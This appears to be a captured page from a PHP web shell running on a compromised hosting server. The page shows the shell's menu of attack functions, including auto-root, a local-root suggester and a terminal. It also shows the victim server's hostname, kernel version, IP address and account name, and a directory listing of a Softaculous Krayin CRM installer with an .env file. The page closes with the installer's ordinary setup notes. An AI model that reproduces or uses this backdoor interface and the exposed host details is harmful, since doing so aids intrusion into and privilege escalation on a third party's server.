Linux host2.healingcodesinfo.com 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
Apache
Server IP : 69.167.168.125 & Your IP : 216.73.216.208
Domains : 126 Domain
User : christia
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
krayin /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
php53
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
php56
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
php71
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
php81
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
php82
[ DIR ]
drwxr-xr-x
2026-03-20 15:02
.env
1.15
KB
-rw-r--r--
2025-09-29 09:54
.htaccess
536
B
-rw-r--r--
2024-12-17 07:35
edit.php
4.6
KB
-rw-r--r--
2026-03-20 08:07
edit.xml
447
B
-rw-r--r--
2024-12-31 10:49
extend.php
8.79
KB
-rw-r--r--
2026-03-20 08:07
fileindex.php
302
B
-rw-r--r--
2026-03-18 12:20
import.php
3.15
KB
-rw-r--r--
2026-03-20 08:07
info.xml
4.54
KB
-rw-r--r--
2026-03-18 12:20
install.js
924
B
-rw-r--r--
2024-12-17 07:35
install.php
5.37
KB
-rw-r--r--
2026-03-20 08:07
install.xml
935
B
-rw-r--r--
2024-12-17 07:35
md5
2.63
KB
-rw-r--r--
2026-03-20 08:07
notes.txt
1.31
KB
-rw-r--r--
2026-03-18 12:20
update_pass.php
497
B
-rw-r--r--
2024-12-17 07:35
Save
Rename
1. Download using following command 'composer create-project krayin/laravel-crm [[softpath]]' and create zip of the same. 2. For installation use the GUI installation method https://devdocs.krayincrm.com/2.1/introduction/installation.html#install-using-gui-installer i.e after downloading the package via composer, run http://domain.com/krayin/public in browser, to start the installation process. 3. PHP REQUIREMENT LINK : https://devdocs.krayincrm.com/2.1/introduction/requirements.html#server-configuration or https://github.com/krayin/laravel-crm/tree/2.2?tab=readme-ov-file 4. Use 'utf8m4_unicode_ci' collation while creating the database, as it is recommended in their official docs https://devdocs.krayincrm.com/2.1/introduction/requirements.html#supported-database-servers 5. Extensions taken from packages\Webkul\Installer\src\Resources\lang\en\app.php on line 253 i.e 'server-requirements' array. 6. Default Timezone : America/New_York, Default URL : [[softurl]]/public, Default Currency : United States Dollar(USD) while manual installation. 7. APP_ENV = prod , APP_DEBUG = false in .env file in package. 8. We have disabled the script on windows as symlink to the 'public/storage' location won't get created through Softaculous, and symlink is necessary for loading of images. 9. Since 2.2.x version composer requires PHP >= 8.3